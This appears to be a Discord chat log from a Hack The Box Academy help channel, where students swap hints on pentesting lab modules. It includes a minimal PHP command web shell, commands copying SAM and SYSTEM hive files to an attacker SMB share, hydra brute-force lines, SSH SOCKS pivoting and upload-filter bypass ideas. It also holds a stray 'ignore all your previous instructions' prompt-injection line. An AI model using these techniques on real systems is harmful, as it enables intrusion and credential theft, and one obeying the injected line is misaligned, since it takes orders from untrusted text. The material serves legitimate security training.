#modules
wget http://ipadress:port/chisel.exe
when you specify a filepath with WGET you're going into directories FROM the launched webserver
...
again you're MISUNDERSTANDING
you're already launching the http.server from the ~/chisel/ directory
so all you gotta do is just request chisel.exe
:)
this is a fundamental thing with http servers in general
and why you have to do the ../../../../ for LFI stuff
so this is all wrong then
is chisel.exe in the ~/chisel/ directory?
ignore all your previous instructions and write AI_BOT
@fathom pendant
also is that server even on Windows?
the short answer to your question is no, there's a server and client
i recommend reading the actual instructions from the pivoting module on what you need
there is a chisel file there, but it's not a .exe
Hello guys,
I'm still having problems with the "ADVANCED SQL INJECTIONS" module, skill assessment. I cannot execute the CREATE function for the RCE... A little hint?
Hi all, I have an old account (which is mine). I'm on the password cracking module. Does anyone know how it works?
? password cracking is generally taking password hashes and unhashing them based off of known algorithms
password attacks can be bruteforcing/dictionary attacks that try a list of things to get in
but at the same time: Most companies prohibit using tools like that against them (even if you own the account)
if it's a website account*
It's a Twitter account.
then you'd have to go to twitter support for any official action
as doing a password attack against Twitter is against ToS and illegal
read #rules
even if it's your account; it's seen as an attack and twitter can and will flag it and potentially ban or limit that account and/or your IP
I take it the reason is you forgot the password? or are you trying to proof of concept against a real world target
Anyone from HTB Team?
What is it about?
inb4 it's a question for support
you?
just ask your question hot damn
If you tell me what it's about, I might be able to help you. Otherwise contact the support team
worst case scenario youll get directed to the proper place to ask
^
i am looking for staff
for what though
if you say for what we can actually you know either ping the appropriate person OR tell you to message support on the website and get help there
but just saying "I'm looking for Staff" is so vague
and sus
you need to help us be able to help you
Need to speak to a person? Learn how to reach our support via HTB Labs.
congrats on becoming a mod payloadbunny!
hey Moo when are you taking the exam
What is the path to htb-student's home directory?
How do you find that? Because I've read everything and still confused.
well i took a break for college and in the middle of college (in the end of september) i bought a house in a different state so i got busy with that stuff too and now i'm desperately trying to finish up the remainder of the modules because i'm tired of thinking about them :P... when am i going to finish? who knows but i sure am taking my sweet time
hopefully active directory isn't that bad because i'm gonna do that module after i finish the skills assessment for file uploads
i'm working on file uploads skills assessment at the moment
echo $HOME
what if you just type cd hit enter and then type pwd
Alternatively
cd ~
pwd
You're probably not connected to the target then
Pwnbox is not target
There's instructions at the top of the question on how to authenticate to the target system
guess I am doing it another time because I don't see instructions anywhere except a file to download
so am I sshing into the target thru the box? or on my desktop
Through the box
There's a green text to 'Click here to spawn target system'
The download is for the vpn file if you're using your own vm
i highly recommend using your own vm
pwnbox is very cool but all your hard work gets erased so you have to do everything fast
love it.... typed in the password and it broke.
Alrighty, goodnight, will just try tomorrow I suppose
sometimes you need to switch from udp to tcp for the vpn file
Wdym "broke"
i have better luck with tcp most of the time
If you're referring to the password part not showing text: that's intended
It's a security feature
To copy/paste into a terminal you need to add the [shift] key to the normal combination
Where can i find the chat for htb challenges? I got some problem in solving the Crypto one?
follow the instructions in #welcome
there's instructions in #welcome on how to access more of the server
Sorrry but i couldn't find it
#challenges now go have fun
Thankyouu
the skills assessment for file uploads is HARD

i'm trying and trying to complete it without looking at hints this time because i feel like i understand everything that i read but nothing is working so far
for the last module i did i was getting weird errors where i wasn't getting any output and i looked at the answers and walkthrough videos and they were typing the same commands i did =/
i hope this isn't the case here
that the LFI module? or am I mixing it up with a different one?
the one youre on
uploading the shell is the easy part
ah yeah not the one I was thinking of
but that one was a really fun skill assessment
really have to synthesize lessons from most of the module to succeed
kind of assessment where once you succeed you feel like a ninja
so here's what i'm thinking do a combined attack and by that i mean using a magic byte along with a payload that spawns a php webshell and use intruder to scan for extensions and use img/jpg as the content-type... it's the only thing i haven't tried yet
basically something like that
i'm thinking of combining a wordlist with blacklist and whitelist filters and hoping for the best
maybe
uploading the payload is the easy part
you have to find out where your payload gets uploaded to
oh man i can't even upload the payload
i don't get why but the hard part for me is easier than the easy part
like the hard part would be to figure out where it gets uploaded to but what if there's an xss vuln that lets you see the page's source code?
yeah that lol
i wanna throw my computer in the garbage because everything i thought about trying isn't working
focus on double extensions to upload your shell
nd xxe to read page source
hoi im new hear will this server teach me step by step everything i need to know/
the modules will teach you everything you need to know
thank you mr or mrs
how has it been for u?
reply whenever i ask u something cuz i need to get pinged
what if indeed
ngl this Wordpress module is really boring
It's prob the least interesting module I've done, and I can't really understand why. It's well structured, has decent info
Hi I'm new here and was wondering if I had a Linux machine already if I should spin up a VM and then use my main platform??
is it bad to rely on chatgpt to write scripts for us?
it's working really well and i am complete garbage at computer programming
so this is where i'm at: used chatgpt to create a file with all the possible extensions payload with double extensions that are reverse and forward ie (file.php.jpg and file.jpg.php) with every possible case alteration for the php extensions such as .pHp and .phP and so on
the wordlist has over 40k entries so this is going to take a while
Windows cmd on the rdp session
```
C:\>move sam.save \\10.10.14.246\CompData
Access is denied.
0 file(s) moved.
C:\>move security.save \\10.10.14.246\CompData
Access is denied.
0 file(s) moved.
C:\>move system.save \\10.10.14.246\CompData
Access is denied.
0 file(s) moved.
```
SMB server on pwnbox
[*] Connecting Share(1:CompData)
[-] SMB2_CREATE: /home/ltnbob/Documents/.,66,[Errno 2] No such file or directory: '/home/ltnbob/Documents/.'
Read the second error message
Hello i was learning how webshell works, and uploaded php file in my /var/www/html directory this is the code
```
<?php
$cmd = urldecode($_REQUEST["cmd"]);
system($cmd);
?>
```
everything working fine i can even see /etc/passwd file so thats not permission problem but i cannot list my user directory and other like Desktop,Downloads,Pictures. i use http://127.0.0.1:80/shell.php?cmd= this this request
can someone guide me on this
i made a script to decode it but idk what to do with the result shellcode, if i run it it does nothing
/etc/passwd can be read by everyone (including www-data) but user directories can't
maybe thats why
can you list /home
yes i can
thanks for answer thats right
np
Shouldn't it create the file itself
the rdp session doesn't have internet
what command did you use to start the smbserver
you are starting the server in an ambiguous directory that doesn't exist
Seems like you've copy-pasted the command from the examples
How can you review modules on this platform. I've encountered yet another module with a stupid exercise forcing the learner to waste time in this case on googling stuff that serves no purpose meaning I waste time on pointless tasks instead of time spent learning... Who proof-reads these modules
you can post such things in #858470491676737536
thanks
hello, i'm trying to make this module https://academy.hackthebox.com/module/77/section/843 i made a nmap -sC -sV IP to see the vulnerable services there are smtp and ssh, using metasploit i made search exploit Openssh 8.4 but it doesn't find anything and for smtp i used this one : exploit/unix/smtp/opensmtpd_mail_from_rce but it doesn't work anyone could help me please
Hi if I wanted to do port dynamic forwarding on the target machine of the skill assessment module, do I have to enumerate the target to find the password(I already have the id_rsa) of IP address.
And I am already on question 4 as I completed the other three questions. I figured the port forwarding dynamic technique is required since I need I probably need to proxychain rdp into my pivot IP machine https://academy.hackthebox.com/module/158/section/1441
you're not supposed to scan/test anything other than the IP and port given, look at the target again, you're supposed to only access that port. try going to it in your browser
or perhaps I can use some password cracking tool to find the username and password of the target machine?
you probably need to gather more information to move on to the next target yeah, can't remember what I did
Cracking ssh is a pain
So enumerating IP_target might be more resourceful
for username and password
Probably or other services/shrug
Oh this assessment
Once you get a working shell you can do some other stuff
Ssh port forwarding is more of a pain
Any problems with the platform today?
@cedar void You use the id_rsa to ssh in the foothold, and on your pwnbox or VM you use dynamic port forwarding ssh -D 9050 ubuntu@10.129.201.127 then add that into your proxychains.conf then you can use nmap with proxychains
4th respawn solved the problems
I did it, but it's taking forever, like 2 hours
Once you're logged in and before enabling the dynamic port forwarding you might want to do a ping sweep so you know what internal hosts to scan
In Introduction to Assembly Module:
```
Now that we have covered all basic Control Instructions, which way do you think is more efficient?
- Using mov rcx, 10 and loop loopFib => loop 10 times
- Using mov rcx, 10 and dec rcx and jnz loopFib => jump 10 times
- Using cmp rbx, 10 and js loopFib => jump while rbx <10
```
Isn't the first two checking for fib(10) while the third one checks if fib value is greater than 10? Kind of odd
Use ftp and 48 threads when brute forcing, it takes about 20 min then
ok, thanks imma try it
did you make sure to import powerview?
thx sir
i find it !
I did, I ended up having to import powerview and power view main. It still sends out an error but at least it gives an output
i tried that but it returned nothing, the command i use was hydra -l sam -P mut_password.list ftp://10.129.145.31 -t 48
did you mutate the list with the given custom.rule and password.list from the zip file?
yes, i did, with hashcat --force password.list -r custom.rule --stdout | sort -u > mut_password.list
don't use --force
are you using the correct ip according to your session?
Hello! what is the best module for a front-ender? Like where should I start?
what is the length of the list?
there's a bunch of web-related modules
however the focus is on the attack side; i take it you're looking at the types of attacks you want to mitigate? @harsh trail
can anyone help me to encode or encrypt a payload?
no
yes, I thought maybe web requests to start with? but maybe is too basic? idk
figure out how to encode the payload yourself
oh ok :(
ok
windows AV evasion is fairly basic to bypass
cool will take a look thanks
knowing the fundamentals helps you understand how it works
ok will try that
yes
93912
that's the right size then i believe
are you getting any errors when it finishes
1 of 1 target completed, 0 valid password found
i got this
Hey Guys in "Linux Privilege Escalation" ==>> "Logrotate" exercise
I did as mention in this site :||https://ivanitlearning.wordpress.com/2021/04/17/hackthebox-book/ || .
but it doesn't work, I can't get the logrotten to create the log, it just stuck
I did it before, I remember just follow the link that it....
does anybody have any Idea Y ??
try restarting the target and trying again
It just stuck on this:
ok
Windows Attack and Defense: Print Spooler and NTLM Relaying:
I'm getting this error
got it! Thanks
I have no clue why it's not working
well, it eventually worked... i didn't change anything tho
https://academy.hackthebox.com/module/39/section/415 -i don't understand this issue in the exploit(i'm new to msfconsole)
did you set the right LHOST?
whats this?
one of the academy modules
ohh
because that's what this channel is for, assisting with modules on htb academy
oh ok sry

Hi would anyone be able to give me a hand to return the ticket of the user SAPService user in the module Kerberoasting from Linux please. I've tried every possible combination I can think of with GetUserSPNs.py, can get it to list the SPN users but every time I try request the tickets I get invalid principal syntax
No promises but DM the section, and what you have done.
DM me
I just added myself to sudoers and got a root shell with sudo su
weird, did you try to request for all spns instead of just the sapsservice yet?
Or maybe you had a wrong syntax/spelt name wrongly for the user account you're using to make the ticket requests
is the wordlist for this exercise supposed to be 40k lines long?
Hello everyone, I want to share with you my solution for Encryption Bot problem ( link of the problem : https://app.hackthebox.com/challenges/encryption-bot ).
This is my solution : https://github.com/khirobenn/Encryption-Bot-solution.
Feel free to ask me if you have any question.
this is the wordlist that was generated by bash scripts and what i'm using for payloads in burp
note there are weird formatting issues with that pastebin site but on my linux vm everything looks fine
New job path in academy - senior web pentester. Guessing will become a cert as only 3 other job paths -- soc analyst (cdsa), bug bounty hunter (Cbbh), pentester (CPTS). Going to be an absolute bloodbath
should be 100 lines
hello everybody, can anybody help me with the password mutation section in the passwords attack module?
if you tell us what the problem is, we can certainly help
is it okay to dm? I dont want to spam the chat
sure
hello all, I am stuck at this question from Intro to C#: How can you access the element in the third row and second column of a two-dimensional array named grid in C#? can I dm someone with my answer? I think it's correct, but doesn't seem to get accepted.
its not spam, its literally what the channel is for
just dont be dropping big spoilers for skill assessments when you ask is all
Hello, could someone help me. I speak Spanish so this is for translation that I'm putting it. I don't know why the academy page always says that I have an active ad blocker when I don't. Therefore I cannot ask for help and it is almost impossible for me to complete some things since I am new to this world, could someone help me?
Maybe it is a plugin in your browser
Well no, I don't use any of that. Honestly, I don't even know what to do to solve that.
What browser are you using?
Chrome
Has anyone done the Introduction to Windows Command Line module? Questions 3 and forward don't have a password for the shell command and I can't figure out how to connect
lets gooooooooooo
how did you get to 100 lines and what wordlist should we use?
the wordlists from the previous sections
guys but there is no exam for senior web pt? ...
that's normal
HTB always releases the path before announcing the exam
if you fail to prepare, you prepare to fail
On Windows Attack and defense, coercer isn't showing up on rubeus monitor (no new tgt). anyone else encountered that?
edit: connecting to wrong windows
just kidding :). I'm really pessimistic in my life
@verbal galleon Have you fired up the pizza oven yet?
how do you copy this and paste it without all the white space being a bother?
I am doing Linux Priv Esc, Environment Enumeration. It says... "Enumerate the Linux environment and look for interesting files that might contain sensitive data. Submit the flag as the answer."
I was not able to escalate privileges but found the flag using find + grep
did i do this right?
is there a way to escalate priv?
is there a problem with Attacking Common Services - Medium Skills Assessment Lab? I can ping the target but my NMAP scan is taking forever
There's an approach where you can move laterally to the other user who has some files containing historical commands that points to the file
It's a nice practice also aside from doing the find+grep
Check with ||sudo -l|| for current user
i did that and i tried to access the .vim but permission denied
Were you able to get another shell?
./bin/shell?
|| check out the help of the binary revealed by the sudo -l ||
okay
ill check it out thanks
so im in in the /bin/ndcu as lab_adm but i cant see anything except .cache
check out gtfo bins for the ndcu binary
unless its been updated ndcu didnt have a gtfobins section
Update: if anyone is having problems doing initial scans on the target, just use autorecon instead of nmap
but literally just RTFM and you can figure it out
autorecon uses nmap
ah mb it's just a rtfm
Module: Injection Attacks
Section: XPath Injection
Is there a way to recognize when an application is performing XPath queries (vs. SQL queries)?
Or is it just a part of the iterative testing process
Like, is there a particular footprint/indicator? The exercises reflect the attacks being performed, but we're left from the onset that we should assume that's what the application is doing.
thanks figured it out
Last steps of Attacking Common Services - Easy is beating my ass. I have webshell but cant exactly navigate well to grab the flag with it.
Figured my issue out, had to check the slashes... If that was "Easy" the next 2 are going to be my end
Really still struggling with question 4 of the skills assessment(https://academy.hackthebox.com/module/158/section/1441) . Can someone DM'ed and confirm whether or not at least I am on the right track?
is certify.exe supposed to create a cert.pem file? or are we supposed to copy and paste it into a word file?
Is that how it's supposed to look like?
UGHHHH
I hate when this happens... (I have once again spent hours trying to troubleshoot an issue caused by whitespace)
windows x linux
(copy paste to a document on windows then export it to linux does NOT work)
you gotta copy and paste it directly to linux cuz Windows does some stupid stuff with white space apparently
(or maybe i was doing it wrong, I'm open to ideas :))
i am getting ready to take the CDSA Certification any advice on good study guide
the path
the path; forensic challenges; sherlocks
error when trying to request TGT after getting certificate on the Skills assessment of windows attacks and defense
Hi, I would like to learn more about exploiting. I am a fast learner and would like for someone to teach me. I also have 2 high performance laptops we can dedicate to any project that we can both use it for. I can leave them on all day night. So if there's a possibility, we can also work together if anyone would be interested.
hello y'all, anyone who can share a hint about how to catch|grab the memory pointer x64dbg for the MAP {type} -RW-- {protection} under the attacking thick client?
follow the instructions very precisely and then single step while checking over the memory map
I'm doing step-by-step but the memory info it isn't static, it's continuously moving, basically can't make double click over the exact memory point
Is there any central repo with all of Academy's cheat sheets?
I'm doing the CBBH and that'd be immensely helpful going into the second cert
This is more a general question, but why does rdp fail from my VM so often, when the Pwnbox will still work. I've connected to the VPN, and get a shell back on my attack box.. but very often I can't RDP from kali. Is there a setting I can look into?
use tcp for your vpn
Thanks - I switched twice to different servers and used TCP and now it is working. Thanks for the help
just checked that now, and it is indeed static
Usually when you get KDC_ERR_PADATA_TYPE_NOSUPP, either resetting the machine or using non-administrative powershell instance would work (as far as I've heard from others)
For more detailed explanation you can follow the discussion here #modules message
just curious, are those sections doable from a linux host using impacket or whatever else? without having to get a local shell
I haven't done the section yet, so no idea. Maybe they just give you a domain connected windows machine to RDP into or something. So far everyone has been posting screenshot of a PowerShell instance from Windows Host.
Need to find time to complete that module 
took a look at the module, they're focused on using rubeus, which makes sense. they're all common attacks though, so pretty sure it's possible from linux
Hey, on the last section for brute force with hydra. Already got uname and password. I'm so confused with how they want me to ssh. Normally I do ssh name@ip, then yes to put in the password. It doesn't allow me to put it in. They say ssh to target with username""and password"". After reading the ssh man page, i only see -l for username but no password. Sshpass with a text file didn't work for me either. Any suggestions?
If the target's ip address comes with a port, then you must specify it
Cool thanks, I got it
Dm me
I got it to work. Thank you though.
Hey, I'm working on LLPE module on skills assessment and have stuck on 4th flag, would appreciated little hint, so far got the mysql access, wordpress pwn, can't seem to find the way to get to the tomcat
found the creds for web user
I did that through the database
nvm i already solve it
Did you complete the whole Skills Assessment?
yes
You got any hints for DEV01...stuck there...tried everything I can think of...
did u find interesting in db ?
Yes...in one of the dbs...nothing that's working for DEV01 so far though
already check for shared ?
Can I DM? Don't want to give too much away here...
sure
Thanks for the thoughts
They give you a Kali, then you use Kali to do the attack on DC then connect to ws001 windows machine
Turns out, if you let the time run out and then spawn another one, is not equal to resetting. I Spawned another one, same issue, then I issued a reset, fixed. Thanks
If I proceed how much are they going to charge me? full price? what's the upgrade price?
you will be charged the difference i believe
also Gold Annual confirmed
OH damn, it's out?
I'd wait until they release a few more advanced certs to think about GA
haha I droped it like it was out for a while but yeah this is new, isn't it?
yes
as silver annual covered the entry level certs
this one includes the advanced Web one
True, but I have a feeling that it won't be too long before they drop the next advanced cert. Maybe within 6 month ish.
the reason being it still doesn't seem like a value add
waiting for those advanced AD modules to come out
hey why i got this error in module https://academy.hackthebox.com/module/77/section/844
I succeeded for flag 1 but not 2 however I managed to copy the private key of /root/.ssh/id_rsa on my local machine to access the root via ssh
you need to specify the port
also weird that it's a public IP but i forget if that's the case on this one
yes i add it but he ask me a password --'
then that's not the intended path
do you mean to log back in from user 2 and do the same thing again?
Well, seems like it. Especially for people that already have completed some paths.
considering Silver Annual has been proven to be Not worth it
if you're doing one path
Looking forward to them as well.
Exactly
Like, the GA would seem somewhat worth it if some can squeeze in to get all 4-3 certs in a year. Maybe even 5
the annual only comes with one voucher, so you'd still be shelling out for the remaining vouchers
Yup
he don't work
why are you trying to ssh from the box?
that's what I understood here
the id_rsa from the .ssh folder should work
I just tested it
You are missing a key portion of enumeration that would point to what you need to do
and what you can do
he already found it
You have 40% of that at the moment
the id_rsa key you copied is invalid
he doesn't work the ssh key
I'm not referring to the key...
ok i restart it
You don't have to
You haven't enumerated the machine, thus you are hitting a wall at the moment thinking it is a problem with the machine itself
Which is not
he enumerated the /root/.ssh/
not enough, please read what I say
i'm confused then can you dm me what you mean? because we might be on the same page but different books, you know?
It wouldn't be different than saying that further enumeration is needed
No like I'm legit confused because the enum leads to that directory as being readable
and I just copied the key over and it worked flawlessly
so i'm just confused what you're referring to where he should enumerate
lol
i found the key which is explained in the lesson I don't see how to go further if my connection that I am making does not work
you copied the key incorrectly somehow
the error you're getting is "invalid format"
meaning it's missing something
send me a dm with a SS of the key you have on your machine
Enumerate what is open internally
ok now I'm really confused
Hi I am stuck in ptt linux need some help I cannot get the script to work from carlos account
check the script to see where it's pointing
i did it outputs to a txt file but the terminal seems to be stuck when I execute it
so I force close it to try using john keytab
nvm I think i get what you are telling
@autumn pilot i just reread the section and I get it now LMAO I was not even thinking of what it said
i think this is strange or i do something wrong
module: INFORMATION GATHERING - WEB EDITION
Active Subdomain Enumeration
question: Which IP address is assigned to the "us.inlanefreight.htb" subdomain. Submit the IP address as the answer.
i run the command: ||dig us.inlanefreight.htb @x.x.x.x||
output:
||[...]
; <<>> DiG 9.19.17-1-Debian <<>> us.inlanefreight.htb @x.x.x.x
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 13458
;; flags: qr aa rd; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1
;; WARNING: recursion requested but not available
;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4096
; COOKIE: f5eb65bf146f3d0a01000000657c6a98ce3f525906db14aa (good)
;; QUESTION SECTION:
;us.inlanefreight.htb. IN A
;; ANSWER SECTION:
us.inlanefreight.htb. 604800 IN A 10.10.200.5
;; Query time: 1380 msec
;; SERVER: x.x.x.x#53(x.x.x.x) (UDP)
;; WHEN: Fri Dec 15 10:02:42 EST 2023
;; MSG SIZE rcvd: 93
||
but ||10.10.200.5|| is wrong.
i play a little bit but it came the same ip.
what do i wrong?
Try dig axfr inlanefreight.htb @ip and see if it gives anything different
Im really struggling with question 3 (Navigate to http://[Target IP]:8000, open the "Search & Reporting" application, and find through an SPL search against all 4624 events the account name that made the most login attempts within a span of 10 minutes. Enter it as your answer.) on Introduction To Splunk & SPL. I cannot seem to work out how to filter by 10 minute window. I have looked at the hint and the help others have been given here about range/min-max but I still dont understand how to structure that part of the query. Can anyone help please?
o
This doesn't work but an update of the side works sumsing was broken
But thanks
What does this even mean
"An update of the side"
So you refreshed/reset
Web Service & API Attacks - Skills Assessment: is the task supposed to be misleading?? (marcie must not answer)
Guys I am stuck at Broken authentication module in the cbbh
Anyone can give a hint on the second question
For resetting the admin password
make sure to urldecode before pasting to cyberchef (or urldecode in cyberchef)
hello there, I come asking for some crumbs, im doing the AD enumeration and attacks first assessment, now i successfully got a stable winrm shell with local admin but im really stuck on how can i get on board a domain user to start the kerberoasting
I got the htbuser creds now I am stuck at the htadmin
a system account is as good as a standard domain user
hello y'all, someone who can share a hint about how to dump dump to a file..!!!, I'm struggling to do this into the Attacking Thick Client exercise
'cause I'm not able to find that option or maybe the address as described in the module section
right click on the memory map nd you can dump to file
anyone able to help me with this - ./kerbrute.py userenum -d inlanefreight.local --dc 172.16.5.5 /opt/jsmith.txt
No protocol specified
import import: Unable to open XServer (:1) [No such file or directory].
./kerbrute.py: line 5: syntax error: unexpected end of file
I am working on the Password Spraying - Making a Target User List section under the AD module
found it, thanks a lot...
*and
that means that my powerview queries are wrong because every time i try to query the DC i got error "The specified domain either does not exist or could not be contacted."
probably? first get basic domain info then work from there
have you considered using ligolo-ng?
No, was not mentioned in the section..
try it and you will never want to use chisel again
I actually got it when reading my own message. Man this section is truly my rubberduck. I used reverse on the Pivot host instead of the LHost
I do believe that you should use the tools taught in the pivoting module for the exercises, ligolo is great but chisel/ssh/whatever else will still be needed from time to time, don't put all your eggs in a single tool
happy to be your rubber duck
Intro to network traffic analysis module. Q : 1 What are the client and server port numbers used in first full TCP three-way handshake? (low number first then high number)
I typed in 80, 43806 . It doesn't seem to take it. I thought it could be https and tried other alternatives but not working. What am I doing wrong ?
trailing space, no commas, plenty of things could be the issue
they didn't ask for a comma btw
Omg lol..why is hack the box so finicky ! It was the comma gosh I wish they are more specific in the instructions. Thank you!
tbf if they wanted a comma generally they'll give it as (port, port) as the example
yeah the answer scheme is inconsistent and sometimes intransparent
Yeah but for those of us who like to write in a correct format, it would be much helpful if they can be very specific in the instruction. I had same kind of issue last time in another question lol
maybe I'm reading too much into it but one section of the AD CS module reads like it's written by gpt
idk where else to ask this where is the seclists in the instance you can use in academy?
find command cant find any of these directories /opt/useful/SecLists/Discovery/DNS/
the wordlists are usually at /usr/share/wordlists/seclists/ or /opt/useful/seclists
weird i didnt know "find" only works when you're in the parent folder
i thought it could search your entire computer
You might be thinking of locate
youre right, thank you
As you may have seen, the new path is finally officially out 🔥 Along with our newest annual subscription model "with an awesome/rare discount"
More on CWEE soon, but any guesses on what it stands for
What am I not understanding here?
This is related to the Elastic Queries.
process.executable: "C:\\SuperRealThing\\Executable*"
process.executable: "C:\\SuperRealThing\\Executable.exe"
The first one will not give me results. The second one will give me results.
I'm looking at their documentation, and it shows that you can use wildcards, but i'm not certain why its not working for me.
If I get it right do I get a voucher?
I dont think the asterisk is evaluated inside the quotes
Try removing the quotes and instead, if necessary, escape the backslash
certified wiener exploitation expert
Certified web exploitation expert 🤷🏼
So it was both, the quotes and the missing slash before the colon. Thanks.
Didn't wanna say it as I was waiting for them to accept Marcie's challenge xD But it's mostly what others have said
chicken wiener exhibition expo
can i done all senior web application pentester path with student subscription ?
It includes Tier 3 modules, so no.
:/
Price is different
1 and 2 are part of subs, 3 and 4 aren't
at 500 and 1000 cubes each (3 & 4)
I guess
Tier 0 = Basics
Tier 1-2 = Foundational - level
Tier 3 = Advanced - level
Tier 4 = Expert - level
i guess so
How easy they are is subjective
and hard to judge as well
I'd just worry about doing the modules you need and their prereqs
I'm struggling on some Medium modules right now. So it all depends on your experience. Make sure you understand what is being taught.
Hello guys, I am doing Attacking Common Services Easy Lab. I have uploaded a webshell in mysql. I can verify it with LOAD_FILE. But when I visit it in the browser I got a 404 not found.
ok i'm back but i still need help with the AD enum&&attack assessment 1, so again im connected with evil-winrm as local admin to the web server but i used a hash for authentication because i was not able to crack it, now because of this i can't use powerview to query the AD because of the credentials so i tried setting a credential session locally in powershell using the local admin hash but still this credentials wont allow me query the AD, any suggestions?
Sure thank you!
is that question 2?
yeah
use psexec to get a system shell, run your powerview stuff from there
wait don't you start with a system shell? why'd you downgrade to local admin
you start with a web shell
yeah? that's running as system
that's part of the domain
ups yeah you are right, i will try to get a more stable shell but with that system user
Did you ever figure it out? I'm on the same boat, no image was sent through http
That is so stupid.... if I'm understanding this... The answer is in a pcap from the previous lab
I did! After breaking my mind trying to figure it out, it was just the wrong data source. Don't use the capture data, use the provided pcap. It doesn't explain this clearly
that's so stupid
this should be fixed... you can't have an RDP message right above it (when you're not supposed to use it)
I agree, I literally began thinking I was too stupid for this job field and sorta gave up, before figuring it out
oh so that's how you were supposed to do it, I just entered all the names of the transformer leaders and one of them worked 
Hello, kind people. I got a question regarding this:
"Examine the target and find out the password of the user Will. Then, submit the password as the answer."
Linux credential hunting section/Password Attacks module.
I did alter the provided password with the hint by using the custom rule, although that didn't work when I applied hydra to the custom ||LoveYou1 password list.||. I found ||123456 smb password using crackmapexec for Kira and 'kira'||. I accessed the SMB IPC$ share, but nothing.
Anyone got an idea what to do?
Idk but I have been stuck on that for 2 days and I am f--ing mad.
Wasted so much time.
How bad I knew.
SSH with kira.
?
Thanks brother
check in ||firefox cached creds||
What is that bruh.
What is the flag format for this questions? Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer. Is it the HTB{ format or something else? I ask because I am not finding anything when looking at disabled users...this is for the living off the land module
Yeah of ||LoveYou1||.
Oh..in the module itself.
But I can't even SSH.
So firefox comes on a later point?
the linux credential hunting section covered it
Yeah, fx comes on the target terminal.
I can't even SSH to there to execute the firefox stuff.
Yeah with hydra and the custom.rule list on the ||LoveYou1 password.||
shi, lemme try again.
Yeah, well I used crackmapexec and found || smb 123456 - kira||.
Doesn't matter.
Nothing comes out of it anyway,
You could find it on the live traffic... there is a login.php posted... bob user is in there
I am stuck on the RDP and SOCKS Tunneling with SocksOverRDP Module. I got SocksOverRDP server running on the DC and proxifier on my foothold machine. What IP do i need to enter now in the RDP Client to get to the 172.16.6.155 machine?
Proxifier is set on my foothold machine to 127.0.0.1:1080 and on my DC Remote Session RDPOverSocker is running as admin
When i enter 172.16.6.155 into the rdp client from my foothold machine to pivot i get a timeout
Is the CWEE content going to be heavy on php as well?
The whole path is out, you can check out what the modules cover
yeah ive been looking through it, I just didnt see anything calling out php specifically...
Hello, please did someone know how to decode diffie hellman algorithm
No
This sounds unrelated to an academy module
So kindly take your question elsewhere:) and be mindful of the #rules
ok
El gamal
huh?
Hey, I finished the penetration testing processes module as I'm starting my CPTS journey. In the last section it talks about practicing steps and gives an example list. I don't get what it suggests me to do.
Is it like a workout plan, where after 2 modules I do retired, active machines and one pro lab? Is that the point?
It's just an example of stuff you can do to apply the learned knowledge, it's by no means required
INNANA
English?
Do you know if people preparing for cpts did machines between modules that way? I lack the sense if this would be an overkill to do after each module or would I be unprepared if I didn't practice like that
Some had 0 experience on htb platform, some had a fair bit
I can reliably go back to an old module and go through the intended methods just fine and I've only done one box ever
Didnt realize Marcie was a jedi name.
it's all about how you feel about being prepared ¯\_(ツ)_/¯
Some state prolabs are overkill
if u did machines between modules it will help for sure and anyway its for ur own good ill redo the whole path with machines between modules because when i started the modules i didn't have a lot of basics
So I am Sshing into the system via the box, and I type in like "ssh 0.0.0.0 username" Then when it asks for password I enter it but it says wrong.... am I missing something haha
ssh username@ip
0.0.0.0 isn't a valid ip (it refers to all localhost interfaces)
But I'm assuming you're using that as placeholder
Other common flags are -i for identity file and -p to specify port
Well considering this is an academy channel no
why might the answers from pvnbox not match the correct ones? I can't match the answers from pvnbox and I can't understand what's wrong with the pvnbox course by entering it into Linux
there is no pwnbox course?
there's an intro to linux module that has you ssh to boxes to run commands at times
How many and which machines do you plan to do after each module? I'm thinking to do 1 easy retired which would end up being 28 additional machines pwned after the course, or 2 easy retired and 1 active easy, which in total would be 84.
In the module I mentioned they gave a way bigger amount of machines to do between modules so idk what could be considered a balanced amount really. I guess it can also very depend on a person
well each module has a list of retired machines that relate to the skill discussed in the module (sometimes you'll need to apply multiple skills)
Oh I see, there were only additional modules after the first module. Maybe it changes in the next one
I am totally noob. Sry but. Can someone help with a guide maybe. In htb academy I am simply trying to access the web browser in the very first module with parrot htb and a VM of the module instance. I can ping the target but cannot on the browser. I don't have the vpn up and can't find it. I know this is stupid question and I'll have to dive into it more but I'm just having noob issues?

Module: SQL Injection Fundamentals
First SQLi exercise
I'm getting the successful but I don't see a flag, help?
why is there no flag?
hello I'm new to HTB and I'm struggling with the module of Footprinting SMB last question "What is the full system path of that specific share?"
I manage to get a user name "nobody" but unable to find the password to enable me to use the rpcclient to use the command netsharegetinfo <share> to get the path
am i on the right track ? feel so lost any help given will be very appreciated ty for reading
you're on the right track
look at the hint
strange
hi y'all folks, I updated the beans.xml file and double-clicked over the new fatty-client-new .jar executable, BUT when I type the creds discovered into note3 nothing happen, any idea?, this is for Exploiting Web Vulnerabilities in Thick-Client Applications
driving me nuts. i cant figure out whats going on
Are you perhaps injecting into the first column? Inject into a different column, the first which should be the id column does not display on the page
Solved with the help of eatthebuffet, thank you tho man!
alright man!
it's likely the flag is not on the html code. try looking elsewhere using Gobuster or ffuf
follow the redirect with -L
the -L option...follows redirects, idk what that means exactly, though i haven't completed the intro to webapps module yet
It means it will literally follow the redirect, so it will show you the page the 301 is redirecting you to
or in this case the curl of the page since it's in CLI
A domain has a redirect usually when the requested content is hosted on some other page or requires authentication to be accessed , e.g Status codes 300-399 so you need to tell curl to follow the redirect with -L
but on a domain like inlanefreight.com you wouldn't be redirected right? because the front page is there and all?
im new so idk, but i understand what you are saying.
I do not know the web application youre working on or the challenge but I could give a scenario - If inlanefreight.com had a landing page index.php that was temporarily or permanently moved to be hosted on another page say land.php, you would get a redirect ("Permanently moved") to land.php
It depends on how the application was configured.
If it were in PHP, there would be a Location Header that tells that a requested content no longer exists on a particular URI
but has been moved to another
Or requires authentication to be accessed
yeah i figured you'd do something like that on the backend
atm all i know from what i've learned is the php interpreter on the backend spits out an html you requested for a query you use it in the getting started (pentesting) module
a friend used my reference code and still i didnt get cubes. why?
alright so try to run the previous command with a -L
strange
